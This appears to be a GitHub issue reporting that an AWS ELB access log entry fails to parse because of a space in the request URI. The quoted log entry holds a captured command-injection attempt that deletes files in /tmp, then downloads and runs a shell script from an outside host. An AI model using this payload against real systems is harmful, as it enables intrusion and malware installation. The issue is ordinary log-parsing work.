Skip to content

[aws] elb access logs fails to parse data #3491

Closed
#3499
Closed
[aws] elb access logs fails to parse data#3491
#3499
Labels
Team:Cloud-MonitoringLabel for the Cloud Monitoring teambugSomething isn't working, use only for issues
@kaiyan-sheng

Description

@kaiyan-sheng
kaiyan-sheng
opened on Jun 8, 2022

When using AWS integration to collect ELB access logs, user sees this log entry cannot be parsed:

http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 75.100.154.140:41542 - -1 -1 -1 301 - 233 390 "GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1" "Hello, world" - - - "Root=1-627cac19-4c6df30820daa80e3fd72ced" "-" "-" 0 2022-05-12T06:41:29.051000Z "redirect" "https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws" "-" "-" "-" "Acceptable" "SpaceInUri"

This is caused by the space in the HTTP request: http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws.

Metadata

Metadata

Assignees

No one assigned

    Labels

    Team:Cloud-MonitoringLabel for the Cloud Monitoring teambugSomething isn't working, use only for issues

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions